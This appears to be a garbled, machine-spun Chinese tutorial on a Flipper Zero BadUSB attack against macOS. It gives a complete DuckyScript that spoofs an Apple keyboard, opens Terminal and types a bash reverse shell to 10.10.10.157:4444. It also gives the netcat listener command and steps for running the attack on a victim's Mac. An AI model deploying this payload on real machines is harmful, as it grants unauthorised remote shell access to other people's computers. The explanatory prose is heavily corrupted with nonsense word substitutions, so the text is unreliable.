这篇文就是个例子,表明怎么样去 将 Flipper Zero 作为什么是道德渗各种测试 BadUSB 环保设备各种怎么样去 不能变成了某些缺陷合理利用的范罪者。不能在您不赋予或没有权利应用的求算机器上应用它。此代码怎么用不懂会议室清空黑客攻击论文查重整体 (IDS)、黑客攻击抵抗整体 (IPS)、wifi网络论文查重整体、防炎墙或预防疾宏病毒 (AV) 軟件。
ID 05ac:021e Apple:Keyboard
DELAY 1000
GUI SPACE
DELAY 200
STRING terminal
DELAY 200
ENTER
DELAY 1000
STRING bash -i >& /dev/tcp/10.10.10.157/4444 0>&1
DELAY 1000
ENTER
DELAY 1000
命令行 | 描叙 |
---|---|
ID 05ac:021e Apple:机械键盘 | 这每行告诉他 macOS 我的 Flipper Zero 真实上是一种个 Apple 联想手机键盘。倘若您不应用这次去,macOS 会出现联想手机键盘设立助手下载会话框,这将以至于您的js失敗。 |
延缓 | 此强制性标识方法平台停留那段时候。这样小编不用以下延缓,按键精灵脚本将工作得太快而失敗。 |
画质面积 | 按 Apple Command 键和回车键拉开“Spotlight 搜”窗口最大化。 |
STRING 手持终端 | 在 Spotlight 搜寻任务栏中手机输入空字符数组“Terminal” |
进行 | 按建盘上的 ENTER 或 Return 键。键后 ENTER 键后,macOS 通电末端工具栏 (/Applications/Utilities/Terminal) |
空格符串 bash -i >& /dev/tcp/10.10.10.157/4444 0>&1 | 此强制性将文档设置末端任务栏图标,该任务栏图标确立到 Netcat 服务于培训器的接触,该服务于培训器侦听网口 4444 上的 10.10.10.157 |
将 IP 地址10.10.10.157和端口4444更改为您服务器的 IP 地址和端口。
将此文件作为rev_shell_macos.txt保存到您的磁盘。 Flipper Zero 上的badusb目录下没有子目录组织,因此如果您为不同的操作系统使用多个有效载荷,请使用对您有意义的命名约定,以便您知道它的作用。
选择并双击SD 卡图标以查看内容。
找到我们之前创建的rev_shell_macos.txt文件并将其拖到badusb文件夹中。
$ nc -nlvp 4444
系统命令 | 工具栏 |
---|---|
数控 | 网猫命令提示符 |
-nlvp | ( n ) 无 DNS 解析,( l ) 侦听传入连接,( v ) 详细输出,( p ) 端口 |
4444 | 要侦听的端口号号 |
现下我门大家的 Netcat 侦听器已需要准备好了并在等待传来对接,我门大家行再继续采取 Flipper Zero BadUSB 主动攻击。
困难的部分已经完成。 Flipper Zero BadUSB reverse_shell_macos.txt文件已写入,移动到 Flipper Zero,Netcat 侦听器正在等待连接。
导航到我们在上一步中复制的 DuckyScript 文件。如果您没有看到该文件,那么您将它复制到了错误的目录。选择rev_shell_macos并单击运行按钮。
当您看到连接到 USB警报时,您可以将 Flipper Zero 连接到 iMac 或 MacBook 的 USB 端口。单击运行按钮。
您能否在主窗户中观察 BadUSB 代码的进展。已经工作状态提高 100%,阻抗就达到了,您能否移除 Flipper Zero。
要您目前在查看 iMac 的计算出来机展示器,您会在完成 DuckyScript 时看出该xss漏洞。我们公司 Ubuntu 业务器上的 Netcat 侦听器展示非常成功表单提交的然而。
您可以使用whoami 、 pwd 、 ls或cd等常规 Linux 命令来导航文件系统和操作操作系统。